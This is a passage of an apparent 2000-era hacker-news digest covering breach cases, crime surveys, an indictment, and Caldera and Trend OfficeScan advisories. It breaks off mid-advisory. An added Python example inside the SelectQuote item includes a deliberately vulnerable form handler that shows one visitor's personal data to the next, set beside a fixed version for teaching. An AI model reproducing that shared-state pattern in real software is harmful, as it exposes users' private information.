      Arescom Provides DSL For Chunghwa Telecom 03/23/00
      HONG KONG, CHINA, 2000 MAR 23 (NB) -- By Staff, IT Daily.
      Broadband provider Arescom has recently been awarded a
      major business contract for 78,000 digital subscriber lines
      (DSL) in partnership with one of Taiwan's wireless service
      providers, Tecom.

      The contract includes the supply and installation of Arescom's
      NetDSL 800 ADSL (asynchronous DSL) modem/bridge and the
      NetDSL 1000 IP (Internet Protocol) router.

      Implementation is expected to start in May and Arescom is
      partnering with Nokia for DSLAM products.

      NetDSL 1000 can support up to 253 users through a hub. It has
      router capabilities already built in. The NetDSL 800 ADSL
      modem provides Internet access and bridging functions through
      Ethernet and USB (Universal Serial Bus) interfaces.

      Reported by Newsbytes.com




      @HWA
      
77.0  HNS:Mar 24th:DETERRENT SENTENCES
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/

      by BHZ Friday 24 March 2000 on 1:45 AM
      Three teenage computer hackers were warned yesterday that they
      faced deterrent sentences after they admitted selling login names
      and passwords stolen from the Internet in the first case of its kind in
      Hong Kong.
      Link: SCMP
      
      http://www.scmp.com/News/HongKong/Article/FullText_asp_ArticleID-20000322020710278.asp
      
      
                 Wednesday, March 22, 2000
                             
             Teen hackers face
            deterrent sentences

      ELAINE PAK LI 

      Three teenage computer hackers were warned
      yesterday that they faced deterrent sentences after they
      admitted selling login names and passwords stolen from
      the Internet in the first case of its kind in Hong Kong. 

      One of the trio, a student, was also convicted of
      downloading songs from the Internet and selling them
      for profit. 

      At Eastern Court, restaurant manager Tam Hei-lun and
      clerk Po Yiu-ming, both 19, and student Mak
      King-lam, 18, pleaded guilty to a total of 49 charges. 

      Magistrate Ian Candy remanded them in custody for
      sentencing on April 5, pending reports, and said: "It is
      precisely these kinds of computer crimes which leave
      Internet users in fear and make them pause before
      conducting even the most basic of transactions. 

      "These criminal activities should be nipped in the bud
      and a deterrent sentence must be imposed." 

      All the offences took place between March 1998 and
      May last year. 

      David Leung, prosecuting, told the court Po had hacked
      into other Internet users' computers and unlawfully
      obtained 127 login names and passwords given to
      Internet users when they subscribe to an Internet service
      provider for a monthly fee and an hourly rate. 

      The three defendants knew each other through the
      Internet and Po had sold some of his illegally obtained
      login names and passwords to Tam for $3,000, but
      gave others for free to Mak. Tam later resold them for
      $1,500. 

      The three were aware that the information they obtained
      was acquired illegally, the magistrate was told. 

      Mr Leung said the three defendants had hacked into the
      accounts of Internet users of Hongkong Telecom IMS
      Netvigator, Vision Network Ltd, City Telecom (HK),
      Netfront Information Technology and ABC Net, saving
      themselves the monthly fees and causing losses to the
      account holders. 

      Tam admitted 14 counts of obtaining access to a
      computer with a view to dishonest gain, Po admitted 12
      and Mak two. 

      Mak also admitted 10 charges of selling pirated discs, in
      which he downloaded songs from the Internet and sold
      200 discs from his own Web site. Each disc contained
      100 songs and was priced at $88. 

      Tam, who asked buyers of the logins to deposit money
      into his bank account, also admitted eight counts of
      dealing with property known or reasonably believed to
      represent proceeds of an indictable offence. 

      Po admitted a further three charges of criminally
      damaging the computers of three users. 


      @HWA
      
78.0  HNS:Mar 23rd:SENSITIVE DATA MADE PUBLIC
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/ 

      by BHZ Thursday 23 March 2000 on 8:32 PM
      Consumers who requested online life insurance quotes from the
      SelectQuote Web site on Tuesday and Wednesday were apparently
      victimized by a software glitch, which caused their personal
      information to be left on the company's Web site, wide open.
      Link: Security Watch
      
      http://www.securitywatch.com/scripts/news/list.asp?AID=2324
      
      
      Insurance site exposes sensitive customers' data 
      (03/23/2000) Consumers who requested online life
      insurance quotes from the SelectQuote Web site on Tuesday
      and Wednesday were apparently victimized by a software 
      glitch, which caused their personal information to be left
      on the company's Web site, wide open. 
      
      The security glitch in the software SelectQuote uses would
      have occurred when a form that consumers fill out to request
      a quote failed to clear its contents at the end of the process.
      This resulted in all personal information (name, address, 
      current coverage and parents' health histories) from the 
      previous user being plainly exposed to the next person 
      requesting a quote. 
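
      One way a form ends up "failing to clear its contents" between
      visitors, added here as an illustration; this is not code from the
      SecurityWatch report or from SelectQuote's software, whose actual
      defect is not described beyond the paragraph above. The class names,
      the field names and the toy pricing formula are assumptions. The
      vulnerable handler keeps the visitor's answers on an object the server
      reuses for every request, so the next visitor's empty form is pre-filled
      with the previous visitor's data; the fixed handler keeps the answers in
      the caller's own session and wipes them once the quote is produced.

```python
"""Cross-visitor data residue in a web form: vulnerable handler beside a
fixed one.  Added example; names and the pricing formula are assumptions."""

QUOTE_FIELDS = ("name", "address", "current_coverage", "parents_health_history")


def price_quote(answers):
    """Toy premium: base rate plus a loading on existing coverage.  Not an
    insurer's formula; it only makes the submit step do real work."""
    coverage = float(answers.get("current_coverage", 0) or 0)
    return round(25.0 + coverage * 0.001, 2)


class SharedStateQuoteForm:
    """VULNERABLE: the working copy of the answers lives on the handler
    object, and the server reuses that one object for every visitor."""

    def __init__(self):
        self._answers = {}

    def render(self, session):
        # Pre-fills from the handler's own dict, not from the caller's session,
        # so whatever the last visitor typed is shown to the next one.
        return {k: self._answers.get(k, "") for k in QUOTE_FIELDS}

    def submit(self, session, answers):
        self._answers.update(answers)
        # BUG: nothing resets self._answers after the quote is produced.
        return price_quote(self._answers)


class PerRequestQuoteForm:
    """FIXED: answers are read from and written to the caller's own session
    and removed as soon as the quote has been produced."""

    def render(self, session):
        return {k: session.get(k, "") for k in QUOTE_FIELDS}

    def submit(self, session, answers):
        session.update(answers)
        try:
            return price_quote(session)
        finally:
            for k in QUOTE_FIELDS:      # wipe PII once it is no longer needed
                session.pop(k, None)


def what_second_visitor_sees(form_cls):
    """Replay the scenario from the report: visitor A completes a quote, then
    visitor B opens the form.  Returns the fields B is shown."""
    form = form_cls()
    session_a, session_b = {}, {}       # one session per visitor
    form.submit(session_a, {"name": "A. Example",            # constructed data
                            "address": "1 Main St",
                            "current_coverage": "100000",
                            "parents_health_history": "none"})
    return form.render(session_b)


if __name__ == "__main__":
    print("vulnerable:", what_second_visitor_sees(SharedStateQuoteForm))
    print("fixed:     ", what_second_visitor_sees(PerRequestQuoteForm))
```

      The same residue appears in real deployments whenever request-scoped
      data is parked in process-wide state: a module-level dict, a singleton
      handler, or a cache keyed on something other than the visitor's session.
      The check is the one the function above performs: submit as one
      identity, then render as a fresh one and confirm every field is blank.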

      @HWA
      
79.0  HNS:Mar 23rd:ALTERING WEB SITES
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/ 

      by BHZ Thursday 23 March 2000 on 5:32 PM
      A Gore computer business has beefed up its security after a
      Brazilian hacker got into one of the websites and defaced it.
      Link: The Press NZ

      http://www.press.co.nz/2000/12/000323x04.htm
      
      Hacker breaches security to alter Alexandra website text

                       By Sonia Gerken

      A Gore computer business has beefed up its security after a
      Brazilian hacker got into one of the websites it manages and
      changed the text. 

      Clive Wilson Computers Gore managing director Ewen
      Whitefield said yesterday the security breach of its domain
      hosting machine last month was low level, but "anyone hacking
      into our machines is serious." 

      The hacker changed text on the website of an Alexandra client.

      Police had been notified of the breach and the company was
      unlikely to pursue it further. 

      "It annoys us more than anything else. If it was a major security
      breach we could chase it back to the United States and Brazil,"
      Mr Whitefield said. 

      If anything the breach proved the company's electronic
      "firewalls" were pretty good, stopping the hacker from getting
      any further than minimal damage, he said. 

      Website designer Ken France, of Arthurton, said the hacker
      probably found a "tiny little hole" to sneak in through. 

      It was an old site, designed two years ago. 

      The breach was annoying and nothing serious - "apart from
      getting a laugh at our expense," he said. 

      There was a big rush of "hits" to the site after the first hacker
      got in. Within a week 200 hits more than usual were logged
      and three or four of those had changed some text, Mr France
      said. 

      "Some even put their telephone number in. 

      "It was like 'If you want to know how I got in here give me a
      call'," he said. 

      The company was warned about the hacking by a phone call
      from someone claiming to be a website watcher in Australia. 

      Mr France said the call came an hour after he had looked at
      the website and it was all right. 

      "It's quite strange how they knew. I suspect it was bogus." 

      Mr Whitefield said the company received an e-mail the day
      after the hacking from the Brazilian Internet Society asking
      questions about the hacker. 

      There was no way to verify the authenticity of the e-mail, he
      said. 

      Mr France said the company's tighter security had been
      effective. 

      At times he had been unable to get into sites he designed that
      were managed by the company. 

      "It's good in a way. If I can't get in, how will anyone else," he
      said. 

      @HWA
      
80.0  HNS:Mar 23rd:SECURITY BREACHES
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by BHZ Thursday 23 March 2000 on 5:28 PM
      More than 90 percent of large corporations and government agencies
      were the victims of computer security breaches in 1999, according
      to a new survey. 
      Link: APB News
      
      http://www.apbnews.com/newscenter/internetcrime/2000/03/22/crimesurvey0322_01.html
      
      
      9 of 10 Companies Report Computer Attacks
      Survey Finds Damages Triple as Cybercrime Booms 
 
      March 22, 2000 
 
      By David Noack 
 
      SAN FRANCISCO (APBnews.com) -- More than 90 percent of large corporations
      and government agencies were the victims of computer security breaches in
      1999, according to a new survey. 
 
      The Computer Security Institute's fifth Computer Crime and Security Survey
      also found that the total reported financial losses have tripled. 
 
      The annual survey is conducted with the participation of the San Francisco
      FBI Computer Intrusion Squad and aims to increase awareness of security.
      This year's survey was based on responses from 643 computer-security
      professionals in U.S. corporations, government agencies, financial
      institutions, medical institutions and universities. 
 
      Only 42 percent of those answering the survey could put a dollar figure on
      their financial losses -- reporting the total at $265 million. The average
      annual total over the last three years was $120 million. 
 
      Widespread and diverse
 
      Patrice Rapalus, director of the Computer
      Security Institute, said the survey points to a
      disturbing trend. 
 
      "Cybercrimes and other information-security
      breaches are widespread and diverse," she
      said. "Ninety percent of respondents reported
      attacks. Furthermore, such incidents can
      result in serious damages. ... Clearly, more
      must be done in terms of adherence to sound
      practices, deployment of sophisticated
      technologies, and most importantly, adequate
      staffing and training of information-security
      practitioners in both the private sector and
      government." 
 
      The survey also found: 
 
           70 percent reported a variety of serious computer security breaches
           other than the most common ones of computer viruses, laptop theft
           or employee "net abuse." Other examples included theft of
           proprietary information, financial fraud, system penetration from
           outsiders, denial of service attacks and sabotage of data or
           networks. 
           74 percent acknowledged financial losses due to computer
           breaches. 
           71 percent of respondents detected unauthorized access by
           insiders. For the third year in a row, more respondents -- 59 percent
           -- cited their Internet connection as a frequent point of attack rather
           than their internal systems -- 38 percent -- as a frequent point of
           attack. 
 
      Financial losses larger 
 
      The report said the financial losses in eight of 12 categories were larger
      than in any previous year. In addition, financial losses in four categories
      were higher than the combined total of the three previous years. For
      example, 61 respondents quantified losses due to sabotage of data or
      networks for a total of $27 million. The total financial losses due to
      sabotage for the previous years combined totaled only $10 million. 
 
      As in previous years, the most serious financial losses occurred through
      theft of proprietary information, with 66 respondents reporting losses of $66
      million and financial fraud and 53 reporting $55 million in losses. 
 
      The survey results show that computer crime threats to large corporations
      and government agencies come from both inside and outside their
      electronic perimeters, confirming trends found in prior surveys. 
 
      Bruce J. Gephardt heads the FBI's Northern California office in San
      Francisco, which covers 15 counties, including Silicon Valley. He said the
      survey helps him decide how to deploy his forces instead of reacting to
      computer crises as they occur. 
 
      Trends and crises 
 
      "The results of the CSI/FBI survey provide us with valuable data," Gephardt
      said. "This information not only has been shared with Congress to
      underscore the need for additional investigative resources on a national
      level, but [it] identifies emerging crime trends and helps me decide how
      best to proactively and aggressively assign resources before those 'trends'
      become 'crises.'" 
 
      CSI, which was established in 1974, is a San Francisco-based association
      of information-security professionals. 
 
      The FBI, responding to an increase in the criminal targeting of major
      components of information and economic infrastructure systems, has
      established the National Infrastructure Protection Center (NIPC), which is
      located at FBI headquarters, and the Regional Computer Intrusion Squads,
      which are located in selected offices throughout the United States. 
 
      The NIPC, a joint partnership among federal agencies and private industry,
      is designed to serve as the government's lead mechanism for preventing
      and responding to cyberattacks on the nation's infrastructure. The Regional
      Computer Intrusion Squads investigate violations of the Computer Fraud
      and Abuse Act, which includes intrusions to public switched networks,
      major computer network intrusions, privacy violations, industrial espionage,
      pirated computer software and other crimes. 
 
      David Noack is an APBnews.com staff writer (david.noack@apbnews.com).

      @HWA
      
81.0  HNS:Mar 23rd:ATTACK COSTS RISE
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      by BHZ Thursday 23 March 2000 on 3:29 PM
      In an annual survey issued on Wednesday, the FBI and the San
      Francisco-based Computer Security Institute showed just how
      pressing: total verifiable losses in 1999 more than doubled to top
      $265 million, while more than 90 percent of respondents reported
      detecting some form of security breach.
      Link: CNNfn

      http://cnnfn.com/2000/03/22/technology/wires/hackers_losses_wg/
      

                        Hacker attack costs rise
                        FBI, CSI: Verifiable losses due to poor
                        security top $265M in 1999
                        March 22, 2000: 7:30 a.m. ET


      SAN FRANCISCO (Reuters) - In a year that saw some of the Internet's best
      known sites seriously hit by hacker attacks, few computer users would
      question that cyber-security is a pressing concern.
           In an annual survey issued on Wednesday, the FBI and the San
      Francisco-based Computer Security Institute showed just how pressing: total
      verifiable losses in 1999 more than doubled to top $265 million, while
      more than 90 percent of respondents reported detecting some form of security
      breach.
           Security experts say a large number of attacks go unrecognized, and the
      total is hard to assess, with companies reluctant to admit they've been
      vandalized. But the annual survey gives a clear picture of a worsening problem.
           "The trends are continuing in the same direction. It's going from bad to
      worse in terms of threats from the outside, while the threat from the inside
      doesn't go away," said Richard Power, CSI's editorial director.
           The fifth annual survey of computer crime and security polled some 640
      corporations, banks and government organizations about the state of their
      computer systems.
           Only 42 percent of these respondents could put a dollar figure on what the
      attacks cost them -- but this figure, at $265 million, was more than double the
      average annual total over the last three years.
           While the most common threats -- computer viruses, laptop theft, or
      employee "net abuse" -- continued apace, at least 74 percent of respondents
      reported more serious security breaches including theft of proprietary
      information, financial fraud, system penetration by outsiders, data or network
      sabotage, or "denial of service" attacks designed to take websites out of
      commission.
           Information theft and financial fraud caused the most severe financial
      losses, put at $68 million and $56 million respectively.
           But "denial of service" attacks, like the ones that temporarily paralyzed
      Yahoo!, eBay, Buy.com, and several other websites in February, are also a
      growing problem, Power said.
           Losses traced to denial of service attacks were only $77,000 in 1998, and
      by 1999 had risen to just $116,250. The new survey, which reports on numbers
      taken before the high-profile February strikes, showed quantified losses up at
      more than $8.2 million.
           "The denial of service showed that many sites are way, way understaffed
      and not adequately secured," Power said.
           "Maybe a half a dozen sites were attacked in that attack, and 150 sites
      were hacked into to launch the attack. There is a widespread insecurity among
      corporate sites and government sites and the problem is not just technological,
      it is human. There are not enough people working on it."
           Bruce Gephardt, in charge of the Federal Bureau of Investigation's northern
      California office, said the survey revealed how quickly computer security is
      becoming a major problem faced by law enforcement, and how more staff was
      needed to fight it.
           "If the FBI and other law enforcement agencies are to be successful in
      combating this continually increasing problem, we cannot always be placed in
      a reactive mode, responding to computer crises as they happen," Gephardt
      said in a news release. 
      
      @HWA
      
82.0  HNS:Mar 23rd:INDICTED FOR HACKING NASA SERVERS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/ 

      by BHZ Thursday 23 March 2000 on 3:28 PM
      A suspected computer hacker made his first court appearance
      Wednesday after being indicted on charges of breaking into
      computers belonging to NASA and the U.S. departments of energy,
      defense and transportation, said federal prosecutors.
      Link: Miami Herald
      
      http://www.herald.com/content/today/business/brkdocs/079991.htm
      
      
      
            Posted at 11:58 p.m. EST Wednesday, March 22, 2000 

      Man indicted after allegedly hacking into
      government computers
     
      SAN FRANCISCO -- (AP) -- A suspected computer hacker made his first court
      appearance Wednesday after being indicted on charges of breaking into
      computers belonging to NASA and the U.S. departments of energy, defense and
      transportation, said federal prosecutors.
     
      Max Ray Butler, 27, of Berkeley was ordered held on $100,000 bail during the
      hearing in San Jose. On March 15, he was indicted on 15 criminal counts,
      including unauthorized access of a computer, recklessly causing damage and
      interception of electronic communication.
     
      All the counts carry sentences of at least six months and fines of hundreds of
      thousands of dollars.
     
      Butler, who also goes by the name of Max Vision, had been an FBI source,
      helping agents solve computer crimes, authorities said. He turned himself in on
      Tuesday.
     
      Butler's attorney did not return a telephone call seeking comment.

      @HWA
      
83.0  HNS:Mar 23rd:CALDERA SYSTEMS SECURITY ADVISORY
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/

      by LogError Thursday 23 March 2000 on 12:19 PM
      The OpenLinux package contains a CGI script called rpm_query that
      allows a user to obtain a list of all RPM packages installed on that
      machine, provided the Apache Web server is running. This could be
      used by an intruder to determine what part of the system to attack.
      Link: Linux Today

      http://linuxtoday.com/stories/18850.html
      
      Caldera Systems Security Advisory: rpm_query allows everyone to list installed rpms
      Mar 22, 2000, 23:23 UTC 
   
      Caldera Systems, Inc. Security Advisory 
   
      Subject:                rpm_query allows everyone to list installed rpms
      Advisory number:        CSSA-2000-007.1
      Issue date:             2000 March, 8
      Last change:            2000 March, 14
      Cross reference:
   
   
      1. Problem Description 
   
      The OpenLinux package contains a CGI script called rpm_query that allows
      a user to obtain a list of all RPM packages installed on that machine, 
      provided the Apache Web server is running. 
   
      This could be used by an intruder to determine what part of the system 
      to attack. 
   
      2. Vulnerable Versions 
   
         System                       Package
         -----------------------------------------------------------
         OpenLinux Desktop 2.3        All packages previous to
                                      OpenLinux-2.3-17
   
         OpenLinux eServer 2.3        All packages previous to
                                      OpenLinux-2.3-24S
   
      3. Solution 
   
      Workaround: 
   
      Remove the script by executing: 
   
           rm -f /home/httpd/cgi-bin/rpm_query 
   
      The proper solution is to upgrade to the latest packages 
   
      4. OpenLinux Desktop 2.3 
   
      4.1 Location of Fixed Packages 
   
      The upgrade packages can be found on Caldera's FTP site at: 
   
      ftp://ftp.calderasystems.com/pub/openlinux/updates/2.3/current/RPMS 

 
      @HWA
      
84.0  HNS:Mar 23rd:REMOTE SECURITY MANAGEMENT
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/

      by LogError Thursday 23 March 2000 on 12:14 PM
      Businesses can have their network security hosted and managed
      remotely using a new service from Network Associates. The
      company's myCIO.com service offers an ASP 'infrastructure' which
      allows partners such as ISPs, telecoms providers and even
      computer resellers to host NAI's products and services online.
      Link: VNUNET
      
      http://www.vnunet.com/News/601120
      
      

      @HWA
      
85.0  HNS:Mar 23rd:"ANTI-ARAB" BUG
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/ 

      by BHZ Thursday 23 March 2000 on 3:29 AM
      The head of Microsoft's European and Middle East operations said
      on Wednesday the firm was fixing a bug in its Windows 2000
      French-language spell-checker which suggested replacing
      "anti-stress" with the word "anti-arab."
      Link: Wired

      http://www.wired.com/news/politics/0,1283,35117,00.html
      
      MS Fixing 'Anti-Arab' Bug 
      Reuters 

      7:00 a.m. Mar. 22, 2000 PST 

      PARIS -- The head of Microsoft's European and Middle East operations said 
      on Wednesday the firm was fixing a bug in its Windows 2000 
      French-language spell-checker which suggested replacing "anti-stress" 
      with the word "anti-arab." 

      Michel Lacombe, president of Microsoft EMEA, said the problem should be 
      fixed in "a few weeks" and that customers would be offered a new version 
      free of charge. 

      "Microsoft is very sorry about this. We are always sensitive to things 
      which confuse people and we are very respectful of people getting hurt," 
      Lacombe told Reuters. 

      "Microsoft has no problem with the Arab world, we invest in the Arab 
      language, and in Arab countries. Our software developers are looking at a 
      way to fix this and in a few weeks this will be behind us," he added. 

       France's national CFDT trade union denounced Microsoft for its "racist 
       turn of phrase." 

       "As it is not able itself to go directly to court, the CFDT is informing 
       national anti-racism societies. It will support any criminal action they 
       should take," the CFDT said in a statement. 

       Lacombe noted that the bug was in its spell-checker, not its thesaurus. 

      "That would be worse. We are not trying to give a synonym of anti-stress, 
      just to help the user solve a spelling problem," he said. 


      @HWA
      
86.0  HNS:Mar 23rd:OFFICE 2000 PATCHES
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/

      by BHZ Thursday 23 March 2000 on 3:28 AM
      Microsoft posted Service Release 1 (SR-1) to the Web for download.
      It is the first collection of patches and fixes for Office 2000 since the
      product began shipping last June. 
      Link: Microsoft

      http://officeupdate.microsoft.com/default.asp

      @HWA
      
87.0  HNS:Mar 23rd:SHARING INFORMATION
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/

      by BHZ Thursday 23 March 2000 on 3:16 AM
      A new bill aimed at encouraging companies to share information
      about hacker attacks would provide firms with a limited exemption
      from the Freedom of Information Act.
      Link: NewsBytes 
      
      http://www.newsbytes.com/pubNews/00/146086.html
      
      Bill Would Protect Firms That Share Hacking Info 

                  
      By David McGuire, Newsbytes WASHINGTON, DC, U.S.A., 21 Mar 2000, 6:00 AM CST

      A new bill aimed at encouraging companies to share information about 
      hacker attacks would provide firms with a limited exemption from the 
      Freedom of Information Act (FOIA). 

      Set to be introduced by Reps. Tom Davis, R-Va. and Jim Moran, D-Va., 
      later this week, the legislation would allow companies to share 
      information about cyberattacks with law enforcers and industry groups, 
      without worrying that such information could come back to haunt them, 
      Davis staffer David Marin said today. 

      "The public interest will be served by companies coming forth to share 
      their information" about attacks, Marin said. Too often now companies do 
      not report cyberattacks for fear that such reports will find their way 
      into the media, he said. 

      While the bill would create a limited shelter under FOIA, it is not 
      intended to allow companies to mask their business dealings, Marin said. 

      When the legislation is completed it will be "narrowly tailored to 
      address (information pertaining to) how the attack was done and what was 
      done to fix the attack," Marin said. The legislation will apply only to 
      telecommunications and information technology infrastructure attacks. 

      Used primarily by the media, FOIA allows members of the press and the 
      public to file legally binding requests for public documents. 

      FOIA already contains an exemption for ongoing criminal investigations, 
      but Davis and Moran are aiming to further protect firms that divulge 
      information about cyberattacks, Marin said. 

      Reported by Newsbytes.com, http://www.newsbytes.com . 
      


      @HWA
      
88.0  HNS:Mar 23rd:MONITORING WITH GOOD RESULTS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/  

      by BHZ Thursday 23 March 2000 on 2:31 AM
      A federal appeals court has upheld a CIA policy allowing agency
      officials to monitor employees' Internet use. The policy had helped
      convict a federal employee of downloading child pornography on
      government time.
      Link: GovExec article
      
      http://www.govexec.com/dailyfed/0300/032000m1.htm
      
      Link: US vs. Simons - court's decision

      http://www.law.emory.edu/4circuit/feb2000/994238.p.html
      
      
      GovExec;
      
      March 20, 2000

      DAILY BRIEFING
 
      Court upholds agency reviews of
      employees' Internet use
 
      By Kellie Lunney
      klunney@govexec.com
 
      A federal appeals court has upheld a CIA policy allowing
      agency officials to monitor employees' Internet use. The policy
      had helped convict a federal employee of downloading child
      pornography on government time. 
 
      The CIA's Foreign Broadcast Information Service
      implemented a policy in June 1998 authorizing "electronic
      audits" of employee computers in order to crack down on
      non-business related Internet use. Those audits included
      reviewing employees' e-mail messages and collecting
      information on their Web site visits.
 
      Later that summer, Science Applications International Corp.
      (SAIC), which had a contract to manage FBIS' computer
      network and monitor inappropriate Internet behavior, alerted
      the agency when the keyword "sex" turned up numerous hits in
      a firewall database during a routine test. The hits originated
      from the computer of Mark L. Simons, an electronic engineer
      at FBIS.
 
      FBIS officials then searched Simons' computer and office on
      four occasions, eventually compiling enough evidence to indict
      him on two counts of knowingly receiving and possessing child
      pornography downloaded from the Internet and stored on his
      government hard drive.
 
      Simons claimed that his Fourth Amendment rights had been
      violated during the searches. But a district court upheld the
      searches. Simons was found guilty and was sentenced to 18
      months in jail.
 
      The U.S. Court of Appeals for the Fourth Circuit affirmed that
      decision in late February, saying that Simons failed to prove
      that he had a "legitimate expectation of privacy in the place
      searched or the item seized."
 
      According to the appeals court, "In the final analysis, this case
      involves an employee's supervisor entering the employee's
      government office and retrieving a piece of government
      equipment in which the employee had absolutely no
      expectation of privacy [due to the agency's Internet
      policy] -- equipment that the employer knew contained
      evidence of crimes committed by the employee in the
      employee's office ... Here, there was a conjunction of the
      conduct that violated the employer's policy and the conduct
      that violated the criminal law."
 
      The court's decision in USA v. Simons (99-4238) is online at
      www.law.emory.edu/4circuit/feb2000/994238.p.html.
      
    

      @HWA
      
89.0  HNS:Mar 23rd:CRIME FIGHTING LAB
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/

      by BHZ Thursday 23 March 2000 on 2:15 AM
      With an eye toward cracking down on cyber crime, officials at the
      College of DuPage on Monday unveiled a new state-of-the-art
      computer lab at the college's Suburban Law Enforcement Academy.
      Link: Chicago Tribune
      
      http://www.chicagotribune.com/news/metro/dupage/printedition/article/0,2669,SAV-0003210202,FF.html
      
      
      FIGHTING CRIME ON
      COMPUTER 
      LAB GIFTS LET COLLEGE OFFER CLASS
      FULL-TIME 
   
      By LeAnn Spencer 
      Tribune Staff Writer 
      March 21, 2000 
   
      With an eye toward cracking down on cyber crime,
      officials at the College of DuPage on Monday unveiled a
      new state-of-the-art computer lab at the college's
      Suburban Law Enforcement Academy.
   
      There, officers will learn how to track computer criminals,
      from pedophiles who prey on children to shysters out to
      bilk people of money to hackers who infiltrate confidential
      Web sites.
   
      The lab at the Glen Ellyn school also will train officers in
      how to conduct on-line investigations, in computer
      modeling that will enable them to reconstruct a crime
      scene, and in how to present the evidence in court.
   
      The new lab was made possible by a donation from
      Microsoft Corp. and Omni Tech Corp. of 51 new
      personal computers, screens and keyboards; a printer and
      overhead projector; all the necessary software; and
      technical support services.
   
      The equipment and software are valued at $250,000,
      college officials said, and enable the college to create one
      of the nation's few specialized computer crime labs
      dedicated to training law enforcement personnel. No
      civilians will be able to enroll in the 40-hour, weeklong
      classes, which will cost $475 in tuition.
   
      "The industry is very motivated in learning how to tackle
      the problems" of computer crime, Bob Herbold, executive
      vice president and chief operating officer of Microsoft,
      said at a Monday unveiling of the lab.
   
      Until now, the law-enforcement academy has held its
      computer crime classes by borrowing computer space
      elsewhere on campus, and only when regular classes
      were out of session. The new computer lab allows the
      academy to offer classes virtually year-round, reaching
      literally hundreds of officers and prosecutors.
   
      Already, the academy is receiving attention from police
      departments all over the country, as well as Canada,
      officials said.
   
      College officials said that there is a real need for the
      training as police and prosecutors struggle to keep pace
      with the sometimes confusing world of computer crime.
   
      "When this was brand-new technology, it was difficult for
      police departments to follow up," said Mike Sullivan,
      Naperville police detective and an instructor at the law
      enforcement academy.
   
      But understanding the inner workings of computers and
      the Internet, officials said, is no different than learning any
      kind of new technology, whether it be fingerprinting or the
      use of DNA evidence.
   
      One unusual aspect of the lab will be that the police
      officers in the class will be able to pose as children and
      log on to pornographic Web sites or chat rooms where
      Internet users prey on the young. As pedophiles reveal
      themselves, they can be investigated and arrested,
      officials said.
   
      "It used to be that pedophiles would go to the park and
      pick their victims," Sullivan said. "As the Internet came
      along, the Internet has become the virtual park."
   
      Such real-life training is invaluable.
   
      "There's no place else that you can go in and see a felony
      being committed while you are doing police training,"
      Sullivan said.
   
      Sullivan noted that many people wrongly think what they
      do on the Internet cannot be traced.
   
      "When a crime is committed on the Internet, it makes it
      easier for us to track you. It's like committing a crime and
      then leaving your license plate at the scene," he said.
   
      "You can't go on the Internet," he said, "without leaving a
      footprint."



      @HWA
      
90.0  HNS:Mar 23rd:HUNTING CROATIAN PIRATES
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by BHZ Thursday 23 March 2000 on 1:49 AM
      Three days ago, first coordinated police action against software
      pirates in Croatia resulted with confiscation of more than 47
      computers, 8536 CD's, 2602 floppy disks and nearly $1 million worth
      of software.
      Link: Bug On-line (Croatian language)

      http://www.bug.hr/vijesti/index.asp?datum=22032000#id3268

      @HWA
      
91.0  HNS:Patch available for OfficeScan vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/ 

      Posted @ March 24, 2000
      Trend Micro has released a patch that eliminates server security
      vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier
      versions, running on Windows NT 4 server with Internet Information
      Server(IIS). ... 
      
      Patch available for OfficeScan vulnerability
      Posted to BugTraq on March 24, 2000
 
      Security Focus BugTraq ID: 1057
 
      Posted: March 22, 2000
 
      Summary
      =======
      Trend Micro has released a patch that eliminates server security
      vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier
      versions, running on Windows NT 4 server with Internet Information
      Server (IIS). These versions of OfficeScan allow intruders within a
      firewall to invoke OfficeScan CGIs on the server without
      authentication - bypassing OfficeScan management console
      password protection. These OfficeScan CGIs are intended for
      administrators to manage the OfficeScan antivirus running on networked
      workstations via the OfficeScan management console. By gaining
      access to execute these CGIs, hackers can use them to change
      OfficeScan antivirus configurations or to uninstall OfficeScan
      antivirus on the desktops.
 
      Issues
      ======
      Trend OfficeScan version 3.51 or earlier versions apply inadequate
      security settings on the OfficeScan server CGI components. If a
      malicious user has the ability to connect to the OfficeScan server
      via a web browser, these CGIs can be executed to send valid
      commands - including the uninstall command - to OfficeScan clients. In
      addition, OfficeScan's implementation of user authentication in its
      management console - password protection - was insufficiently
      encrypted, and allows a malicious user to decrypt it and gain access
      to the OfficeScan management console.
 
      Implementation
      ==============
      Trend Micro has released a patch that will secure access to the
      OfficeScan CGIs on the server. The patch program changes the file
      permissions on the OfficeScan CGIs, so only administrators can
      access and execute them. This patch works only on drives
      formatted to use the Windows NT file system (NTFS). After applying this
      patch, hackers will no longer be able to remotely invoke OfficeScan
      CGIs without being authenticated as an administrator by NTFS
      security. This patch also prevents hackers who sniff for the OfficeScan
      management console password over the network from gaining
      access to the OfficeScan management console. Access to the
      OfficeScan management console or to execute OfficeScan CGIs
      now requires NTFS authentication.
 
      Affected Software Versions
      ==========================
      Trend OfficeScan Corporate Edition 3.0
